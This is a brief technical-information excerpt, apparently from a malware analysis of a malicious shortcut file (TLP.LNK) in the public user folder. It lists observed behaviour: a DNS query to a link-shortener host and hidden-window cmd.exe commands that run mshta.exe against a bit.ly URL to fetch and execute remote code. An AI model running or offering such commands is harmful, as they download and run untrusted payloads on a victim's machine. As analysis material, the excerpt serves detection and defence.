Technical Information
- '%WINDIR%\explorer.exe' C:\Users\Public\TLP.LNK
- C:\users\public\tlp.lnk
- 'bi#.ly':443
- DNS ASK bi#.ly
- '<SYSTEM32>\cmd.exe' /C START /b <SYSTEM32>\MSHta https://bit.ly/2HDB1zD' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C START /b <SYSTEM32>\MSHta https://bit.ly/2HDB1zD
- '<SYSTEM32>\mshta.exe' https://bit.ly/2HDB1zD